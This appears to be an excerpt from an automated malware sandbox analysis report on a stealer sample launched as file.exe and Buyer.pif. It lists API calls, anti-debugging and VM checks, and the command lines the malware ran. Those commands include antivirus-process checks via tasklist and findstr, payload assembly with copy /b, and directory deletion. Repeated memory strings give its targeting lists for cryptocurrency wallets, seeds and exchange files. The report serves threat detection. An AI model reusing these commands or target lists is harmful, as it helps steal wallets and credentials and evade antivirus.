                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAD65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00FAD65B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB9DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00FB9DB1
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB9F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00FB9F0C
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F44E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00F44E68
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\447331Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\447331\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,11696428655p
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Buyer.pif, 0000000B.00000002.2537199925.0000000003ABA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x.intuit.comVMware20,11696428655t
                    Source: Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: nara Change Transaction PasswordVMware20,1169642/Iwx^;
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FBF229 BlockInput,11_2_00FBF229
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F728E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F728E2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F65038 mov eax, dword ptr fs:[00000030h]11_2_00F65038
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA1244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_00FA1244
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F60B8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F60B8F
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F60D25 SetUnhandledExceptionFilter,11_2_00F60D25
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F60F71 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00F60F71
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara matchFile source: Process Memory Space: Buyer.pif PID: 2380, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FA18E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00FA18E3
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F82F58 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00F82F58
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F5F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,11_2_00F5F64C
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAE9FA mouse_event,11_2_00FAE9FA
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 447331
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "typesfaxincreasecompound" Ensemble
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Buyer.pif p
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDHJKKJDH" & exit
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FA1244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_00FA1244
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FA1D45 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00FA1D45
                    Source: Buyer.pif Binary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00F609E8 cpuid 11_2_00F609E8
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00F9E4B6 GetLocalTime,11_2_00F9E4B6
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00F9E514 GetUserNameW,11_2_00F9E514
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00F7BCA2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00F7BCA2
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: 11.2.Buyer.pif.1354718.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.Buyer.pif.1354718.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.Buyer.pif.40f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Buyer.pif PID: 2380, type: MEMORYSTR
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
